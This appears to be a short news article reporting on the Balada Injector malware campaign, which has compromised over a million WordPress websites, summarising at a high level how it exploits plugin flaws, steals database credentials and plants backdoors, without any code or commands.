Over 1 million WordPress websites were affected by the malware Balada Injector. The campaign that is aimed to deploy it has been working on it since 2017.
How does it work?
Based on GoDaddy’s Sucuri reports, the extensive campaign “leverages all recognized and only newly created theme and plugin vulnerabilities” to damage WordPress websites. Every several weeks, the strikes are reported to happen in waves.
Here’s what Dmitry Sinegubko, a security expert, said about it:
“This campaign is clearly recognizable by its predilection for String.fromCharCode obfuscation, the use of recently registered web addresses hosting malicious programs on various subdomains, and by links to numerous scam sites.”
Among the compromised websites are those that fool visitors with phony tech support, false lottery winners, and harmful CAPTCHA pages that trick victims into enabling alerts, allowing the criminals to deliver spam emails.
What else is Balada Injector able to affect?
The report expands on the latest studies from Doctor Web campaign that explained the way a Linux malware family performs in detail.
In order to take advantage of well-known security flaws like HTML injection and Site URL, the Balada Injector has over 100 domains and a variety of techniques at its disposal. The database credentials contained in the wp-config.php file are the major target of the hackers’ efforts.
The assaults are also intended to access or copy arbitrary site files, such as database dumps, log and failure files, backups, and search for instruments like adminer and phpmyadmin that might have been left behind by site administrators after finishing maintenance operations.
As a result, the malware enables the creation of phony WordPress admin users, gathers data from the core hosts, and maintains backdoors for enduring access.
To find writable directories that relate to other websites, Balada Injector also does extensive checks from top-level directories connected to the hijacked website’s file system.
How was it actually discovered?